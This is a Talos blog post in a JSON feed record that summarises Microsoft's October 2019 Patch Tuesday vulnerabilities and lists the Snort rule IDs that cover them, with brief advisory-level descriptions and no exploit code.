"[](<http://3.bp.blogspot.com/-bIERk6jqSvs/XKypl8tltSI/AAAAAAAAFxU/d9l6_EW1Czs7DzBngmhg8pjdPfhPAZ3yACK4BGAYYCw/s1600/recurring%2Bblog%2Bimages_patch%2Btuesday.jpg>) \n \n \n \n \n \n \n \n \n \n \n_By Jon Munshaw._ \n \nMicrosoft released its monthly security update today, disclosing a variety of vulnerabilities in several of its products. The [latest Patch Tuesday](<https://portal.msrc.microsoft.com/en-us/security-guidance>) discloses 60 vulnerabilities, nine of which are considered \"critical,\" with the rest being deemed \"important.\" \n \nThis month\u2019s security update covers security issues in a variety of Microsoft services and software, the Chakra Scripting Engine, the Windows operating system and the SharePoint software. \n \nTalos also released a new set of SNORT\u24c7 rules that provide coverage for some of these vulnerabilities. For more, check out the Snort blog post [here](<https://blog.snort.org/2019/10/snort-rule-update-for-oct-8-2019.html>). \n \n\n\n### Critical vulnerabilities\n\nMicrosoft disclosed nine critical vulnerabilities this month, eight of which we will highlight below. \n \n[CVE-2019-1333](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0712>) is a client-side remote execution vulnerability in Remote Desktop Services (RDP) that occurs when a user visits a malicious server. An attacker could exploit this vulnerability by having control of a malicious server, and then convincing the user to connect to it \u2014 likely via social engineering or a man-in-the-middle attack. An attacker could also compromise a legitimate server and then host malicious code on it, waiting for a user to connect. If successful, the attacker could gain the ability to remotely execute code on the victim machine that connected to the server. \n \n[CVE-2019-1238](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1238>) and [CVE-2019-1239](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1239>) are remote code execution vulnerabilities that exist in the way VBScript handles objects in memory. These bugs all could lead to memory corruption in a way that would allow an attacker to execute arbitrary code on the victim machine. An attacker could exploit these vulnerabilities by tricking a user into visiting a specially crafted, malicious website through Internet Explorer. They could also embed an ActiveX control marked \"safe for initialization\" in an application or Microsoft Office document that utilizes the Internet Explorer rendering engine. \n \n[CVE-2019-1307](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1307>), [CVE-2019-1308](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1308>), [CVE-2019-1335](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1335>) and [CVE-2019-1366](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1366>) are all memory corruption vulnerabilities in the Chakra Scripting Engine inside of the Microsoft Edge web browser. An attacker could use these bugs to corrupt memory on the victim machine in a way that would allow them to remotely execute arbitrary code. A user could trigger these vulnerabilities by visiting a specially crafted, malicious website in Edge. \n \n[CVE-2019-1372](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1372>) is an elevation of privilege vulnerability on Azure Stack when the Azure App Service fails to properly check the length of a buffer prior to copying memory to it. An attacker could exploit this vulnerability to copy any function run by the user, thereby executing code in the context of NT AUTHORITY/system, which could allow the attacker to escape a sandbox. \n \nThere is also [CVE-2019-1060](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1060>), a remote code execution vulnerability in Microsoft XML Core Services. \n\n\n### Important vulnerabilities\n\nThis release also contains 51 important vulnerabilities. \n\n\n * [CVE-2019-0608](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0608>)\n * [CVE-2019-1070](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1070>)\n * [CVE-2019-1166](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1166>)\n * [CVE-2019-1230](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1230>)\n * [CVE-2019-1311](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1311>)\n * [CVE-2019-1313](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1313>)\n * [CVE-2019-1314](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1314>)\n * [CVE-2019-1315](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1315>)\n * [CVE-2019-1316](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1316>)\n * [CVE-2019-1317](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1317>)\n * [CVE-2019-1318](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1318>)\n * [CVE-2019-1319](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1319>)\n * [CVE-2019-1320](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1320>)\n * [CVE-2019-1321](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1321>)\n * [CVE-2019-1322](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1322>)\n * [CVE-2019-1323](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1323>)\n * [CVE-2019-1325](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1325>)\n * [CVE-2019-1326](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1326>)\n * [CVE-2019-1327](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1327>)\n * [CVE-2019-1328](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1328>)\n * [CVE-2019-1329](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1329>)\n * [CVE-2019-1330](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1330>)\n * [CVE-2019-1331](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1331>)\n * [CVE-2019-1334](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1334>)\n * [CVE-2019-1336](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1336>)\n * [CVE-2019-1337](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1337>)\n * [CVE-2019-1338](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1338>)\n * [CVE-2019-1339](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1339>)\n * [CVE-2019-1340](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1340>)\n * [CVE-2019-1341](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1341>)\n * [CVE-2019-1342](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1342>)\n * [CVE-2019-1343](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1343>)\n * [CVE-2019-1344](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1344>)\n * [CVE-2019-1345](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1345>)\n * [CVE-2019-1346](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1346>)\n * [CVE-2019-1347](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1347>)\n * [CVE-2019-1356](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1356>)\n * [CVE-2019-1357](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1357>)\n * [CVE-2019-1358](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1358>)\n * [CVE-2019-1359](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1359>)\n * [CVE-2019-1361](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1361>)\n * [CVE-2019-1362](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1362>)\n * [CVE-2019-1363](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1363>)\n * [CVE-2019-1364](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1364>)\n * [CVE-2019-1365](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1365>)\n * [CVE-2019-1368](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1368>)\n * [CVE-2019-1369](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1369>)\n * [CVE-2019-1371](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1371>)\n * [CVE-2019-1375](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1375>)\n * [CVE-2019-1376](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1376>)\n * [CVE-2019-1378](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1378>)\n\n### Coverage \n\nIn response to these vulnerability disclosures, Talos is releasing a new SNORT\u24c7 rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org. \n \nThese rules are: 51733 - 51736, 51739 - 51742, 51781 - 51794\n\n", "modified": "2019-10-08T10:11:15", "published": "2019-10-08T10:11:15", "id": "TALOSBLOG:3052A7B74E1E13F630CF51AB1B1A36D6", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/5gWDxm3fpIE/microsoft-patch-tuesday-oct-2019.html", "type": "talosblog", "title": "Microsoft Patch Tuesday \u2014 Oct. 2019: Vulnerability disclosures and Snort coverage", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
